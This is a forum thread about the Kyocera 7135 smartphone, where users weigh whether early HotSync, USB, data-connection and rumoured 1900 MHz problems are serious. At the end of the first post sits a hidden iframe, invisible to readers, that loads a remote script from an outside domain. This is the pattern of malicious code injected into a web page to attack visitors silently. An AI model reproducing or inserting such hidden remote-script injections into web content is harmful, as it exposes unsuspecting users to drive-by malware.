+ Reply to Thread

7135 "Problems" or Normal

Why is it that some folks seem to feel that since the phone is not completely "plug n play" on the Verizon's web (hey, it is doesn't come configured for Verizon) and they don't see a phone number from their address book right away (they do see caller ID numbers, believe), that there is something wrong with the phone. I have a simple and cheapie Kyocera 2235 and I needed to do some configuring to get it working on the web and I also don't always see more than the phone number right away per caller ID.

Am I painting a too rosy picture based on the feedback I've read so far or do anyone else "feel me" and don't think there are any red flags on this phone now?

I may change my tune later this week but everything I've read so far as "problems" with this phone are not significant. I've read similar things with every release new Palm devices since my first one in 1997. In fact, having a stable OS in this phone gives me a more comfortable feeling about the 7135. At least I ought to be able to use the hacks I'm currently using with my m505.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Um....how'd you get the phone from Verizon anyway? As far as I know, it isn't even out yet and every verizon store is telling me late january.

Merlyn please look at the other 10210381209381 threads saying people purchased from getconnected.com / alltel and converted/activated to Verizon!

Re: 7135 "Problems" or Normal

Originally posted by Beryl
    Am I painting a too rosy picture based on the feedback I've read so far or do anyone else "feel me" and don't think there are any red flags on this phone now?
    It's the age old saying...."You can please some of the people some of the time......."

People expect $3,000 worth of quality in a $500 phone sometimes. What can ya do...

Let me put it this way. I bought a 6035 and returned it within 2 weeks because I thought the phone was mediocre and the pda was mediocre. I am now the happy owner of a 7135 with NO COMPLAINTS. The PDA is much easier to use than the 6035 or my wife's PalmVx. The phone is much improved over the 6035 too, no more missed calls because of anemic ring and vibrate. No dropped calls from weak reception. PLUS I get an mp3 player, a slideshow viewer and movies with sound are coming real soon. What's not to love?

Folks,

I believe there are enough glitches with Express Network, “Dormant” connections, and how the phone handles them, that if I were Verizon, I would hold the phone back in it's current state. I posted some details in another thread. (Note that you can work around the “dormant connection” issue by not moving in and out of the phone and FaxModem application when a connection is active.)

I also seem to have a lot of problems with USB and Plug and Play. The phone seems to be designed to not be detected until a HotSync starts (phone detected as a Palm device) or you enter the FaxModem app (phone detected as a Modem). Yet the phone occasionally is detected as an Unknown USB device when just sitting in the cradle, and then you can’t Hotsync until you re-boot the phone or your PC. Here’s another workaround that seems to work: enter the FaxModem app, start and stop a connection with your PC, and then try HotSyncing…

Both of these issues would stop me from releasing the phone. But both have workarounds, so I think most of the people on this forum could handle it. The general population would have to call technical support. Both are clearly software issues.

BTW, I have had better reception with this phone than any phone I have owned – so I (for one) do not think that reception problems are holding it up.

Glenn

Hotsync -- you hit the nail right on the head...

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

Originally posted by WORBC
    Hotsync -- you hit the nail right on the head...
    I think there are situations where what HotSync say's is true however....I don't think features that are suppose to work a certain way and don't is one of them. I think you have every right to expect a $500 or a $1.00 piece of equipment that states it is SUPPOSE to work a certain way to work that way. Not with work-arounds but straight forward. Having said that though it is also not unreasonable to expect bugs in this type of equipment. The 7135 is pretty sophisticated stuff doing fairly leading edge things.

So I guess we are somewhere in the middle. Yes it should work as advertised but it may not be on the first go around. (or the second) I think you should adjust your expectations based on how new the 7135.

How do you tell the pioneers from the rest...by the arrows in their backs..... :upsidedow

Originally posted by Kevinw
    How do you tell the pioneers from the rest...by the arrows in their backs..... :upsidedow
    I like that!

Originally posted by Kevinw
    Of course, the variation (often used in political circles) is that the first ones to storm the beach usually end up dead.

I learned the other day that the problems with the 7135 have something to do with it not working properly in the 1900 Mghtz range, and the GPS/911 chip doesnt' function properly. This is why VZW or Sprint have not launced this phone yet. the Gps thing may be a waiver and then issued with a software upgrade, but with SPrint being a PCS (1900) mghtz company and VZW utilizing 1900 PCS in many markets and is a key component for it's America's Choice and Single Rate plans, this would explain the delay. Alltell operates on the 800 Mghtz frequency known as "digital cellular" which is why they were able to launch the phone. Essentially it's dual mode phone at this time..... from I was lead to believe, and the fix evidently was "no estimated time"

JP
    Originally posted by lnoble
    Of course, the variation (often used in political circles) is that the first ones to storm the beach usually end up dead.
    Or "The early bird may get the worm, but the SECOND mouse gets the cheese."

semm71: Thanks for the interesting information. My question: Could the 1900 MHz issues as you understand them also be fixed by a software upgrade, or would only hardware revisions do the trick? In my case, I spend almost all my time in an 800 MHz area, so a temporary problem is not so big an issue, but a permanent one obviously more serious.

Originally posted by semm71
    I learned the other day that the problems with the 7135 have something to do with it not working properly in the 1900 Mghtz range, and the GPS/911 chip doesnt' function properly. This is why VZW or Sprint have not launced this phone yet. the Gps thing may be a waiver and then issued with a software upgrade, but with SPrint being a PCS (1900) mghtz company and VZW utilizing 1900 PCS in many markets and is a key component for it's America's Choice and Single Rate plans, this would explain the delay. Alltell operates on the 800 Mghtz frequency known as "digital cellular" which is why they were able to launch the phone. Essentially it's dual mode phone at this time..... from I was lead to believe, and the fix evidently was "no estimated time"
    Hehehe, I think someone blew smoke up your butt. The MSM (the Qualcomm chip that is the phone's CPU) handles GPS; there is no such monster as a "GPS/911 chip." I can't say one thing or another about the PCS problems, but I'd sure take it with a shaker of salt.
    LART 'em all! Let /root grep 'em out!